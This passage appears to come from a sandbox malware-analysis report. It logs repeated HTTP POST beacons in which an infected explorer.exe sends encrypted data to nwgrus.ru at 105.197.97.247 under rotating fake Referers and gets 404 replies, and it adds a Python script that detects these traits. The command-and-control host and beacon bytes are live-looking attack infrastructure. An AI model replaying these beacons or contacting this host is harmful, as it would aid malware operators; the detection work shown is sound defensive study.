                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        21 | 192.168.2.5 | 49910 | 105.197.97.247 | 80 | 1028 | C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:44.037916899 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://isbmdtufnkfjsgc.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 342
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:44.037940025 CEST | 342 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 5b 1a d4 f1
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu[5C~`nW3oabe'"?tQV\{7vrsW'ZD@6U C$en!dx)w[W?YPMj
                                        Oct 7, 2024 14:59:44.971501112 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID 22 | Source 192.168.2.5:49916 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:44.981661081 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://dkfsbqntnihxbnlu.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 223
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:44.981683016 CEST | 223 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 5b 07 b1 ae
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu[VHvcMw!6i|LXk4]A.4.9TAH_d3~SJ&0z*M/RaEb
                                        Oct 7, 2024 14:59:45.906971931 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:45 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID 23 | Source 192.168.2.5:49922 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:46.020895004 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://aiwrtqoespykiwu.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 171
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:46.021135092 CEST | 171 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 23 0a e1 f8
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu#c}tJm97x"oar0UVd,0YMGMMo*F.`]hj
                                        Oct 7, 2024 14:59:47.047126055 CEST | 189 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:46 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                        Data Ascii: #\6Y9l_m=rA
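The sessions above share one shape: explorer.exe POSTs to /tmp/index.php on nwgrus.ru with a Referer naming a different, random-looking domain on every request, a Content-Type of application/x-www-form-urlencoded over a body that is raw binary, and the server answers 404 and closes the connection; session 23's 404 carries a non-text body instead of the usual HTML page. The following Python is an added triage example written for this page, not Joe Sandbox output and not SmokeLoader code. It parses a raw HTTP message and scores those observable indicators. The beacon bodies are the first 82 bytes of sessions 21 and 22 copied from the Data Raw columns (the page truncates them, so Content-Length is recomputed), the benign request and example.com host are constructed for contrast, and the 5.5-bit entropy cut-off is a heuristic choice. The shared-prefix helper only measures how many leading bytes the two bodies have in common; it does not decode the protocol.

```python
"""Triage heuristics for the HTTP exchanges captured above. Added example: not
Joe Sandbox output and not SmokeLoader code. Beacon bytes are copied from the
report's Data Raw columns (truncated there, so Content-Length is recomputed);
the benign request and example.com are constructed for contrast."""
import math
from collections import Counter
from urllib.parse import urlsplit

# Bytes a valid application/x-www-form-urlencoded body may contain.
_FORM_BYTES = frozenset(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~%+&=*")


def build_message(start_line: str, headers: dict, body: bytes) -> bytes:
    """Assemble a raw HTTP/1.1 message with a Content-Length matching the body."""
    lines = [start_line] + [f"{k}: {v}" for k, v in headers.items()]
    lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    start, *header_lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers, body


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted data sits near the log2(len) ceiling, text well below."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def body_not_form_encoded(headers: dict, body: bytes) -> bool:
    """Content-Type claims form encoding, yet the body carries bytes no form can."""
    ctype = headers.get("content-type", "").lower()
    return ctype.startswith("application/x-www-form-urlencoded") and any(
        b not in _FORM_BYTES for b in body)


def referer_host_mismatch(headers: dict) -> bool:
    """Referer names a host other than the Host header (rotating fake Referer)."""
    referer, host = headers.get("referer"), headers.get("host")
    if not referer or not host:
        return False
    return urlsplit(referer).hostname != host.split(":")[0].lower()


def text_type_binary_body(headers: dict, body: bytes) -> bool:
    """A text/* response whose body is not printable text (binary behind a 404)."""
    if not headers.get("content-type", "").lower().startswith("text/"):
        return False
    text = body.decode("utf-8", errors="replace")
    return any((ord(ch) < 0x20 and ch not in "\t\r\n") or ch == "\ufffd" for ch in text)


def triage_request(raw: bytes) -> dict:
    """Score one captured request; the 5.5-bit entropy cut-off is a heuristic choice."""
    start, headers, body = parse_http(raw)
    hits = {"body_not_form_encoded": body_not_form_encoded(headers, body),
            "referer_host_mismatch": referer_host_mismatch(headers),
            "high_entropy_body": shannon_entropy(body) > 5.5}
    return {"request_line": start, "score": sum(hits.values()), **hits}


def shared_prefix_len(bodies) -> int:
    """Bytes common to the front of every body: a candidate content signature."""
    first, *rest = bodies
    n = 0
    while n < len(first) and all(n < len(b) and b[n] == first[n] for b in rest):
        n += 1
    return n


# First 82 body bytes of the session 21 and 22 POSTs, as shown in Data Raw above.
BEACON_BODY_S21 = bytes.fromhex(
    "3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d "
    "47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 "
    "4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 5b 1a d4 f1")
BEACON_BODY_S22 = bytes.fromhex(
    "3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d "
    "47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 "
    "4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 5b 07 b1 ae")
BEACON_REQUEST = build_message("POST /tmp/index.php HTTP/1.1", {
    "Connection": "Keep-Alive", "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "*/*", "Referer": "http://isbmdtufnkfjsgc.net/", "Host": "nwgrus.ru",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko",
}, BEACON_BODY_S21)
# Constructed benign form POST for contrast (example.com is a placeholder host).
BENIGN_REQUEST = build_message("POST /login HTTP/1.1", {
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": "http://example.com/login", "Host": "example.com"}, b"user=alice&action=login")
_RESP_HEADERS = {"Server": "nginx/1.26.0", "Content-Type": "text/html; charset=utf-8",
                 "Connection": "close"}
# Session 22's HTML 404 (abridged) and session 23's 404 carrying a non-text body.
RESPONSE_404_HTML = build_message("HTTP/1.1 404 Not Found", _RESP_HEADERS,
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n<html><head>\r\n'
    b"<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n</body></html>")
RESPONSE_404_BINARY = build_message("HTTP/1.1 404 Not Found", _RESP_HEADERS, bytes.fromhex(
    "00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac "
    "17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb"))
```

Run against the captured request, `triage_request(BEACON_REQUEST)` scores all three indicators, while the constructed benign login scores none; `shared_prefix_len([BEACON_BODY_S21, BEACON_BODY_S22])` shows the two bodies agree on their first 70 bytes and diverge immediately after `2d 5b`, which is the kind of stable leading run a content signature can key on. The mismatched-Referer and binary-under-form-encoding checks are cheap enough to run inline on a proxy or IDS log, and the text/* response check catches the session 23 case where a 404 status line fronts a non-HTML body.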


                                        Session ID 24 | Source 192.168.2.5:49939 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:48.526978016 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://isyxarorgwntyxfd.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 186
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:48.526978016 CEST | 186 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 48 34 e4 95
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA ,[k,vuH4d\Wbo;YaaaYKbjoXY]M2[t6'_7?O=F
                                        Oct 7, 2024 14:59:49.566504955 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:49 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID 25 | Source 192.168.2.5:49945 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:49.618535995 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://busntnknves.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 347
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:49.618563890 CEST | 347 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 40 38 ef 82
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu@8\>X]:7`:phQ\R"TFHvY-O0GS< SVn_]6i)=9scdXRli;>B
                                        Oct 7, 2024 14:59:50.520540953 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:50 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID 26 | Source 192.168.2.5:49952 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:50.586827993 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://ewcutxkdkeyvacp.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 244
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:50.586843967 CEST | 244 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 67 32 cb e8
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vug2xI3UD${;LvDmXJ7TOGH>DfF,=bU,1@7CtNC=&)bj7Px
                                        Oct 7, 2024 14:59:51.497476101 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:51 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session ID 27 | Source 192.168.2.5:49961 | Destination 105.197.97.247:80 | PID 1028 | Process C:\Windows\explorer.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Oct 7, 2024 14:59:51.742364883 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://lwocwqbtqohnf.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 169
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:51.742364883 CEST | 169 | OUT | Data Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 74 39 bd 9d
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vut9KLhxgaY?{~ii56Mah![p\F| 6
                                        Oct 7, 2024 14:59:52.660981894 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:52 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
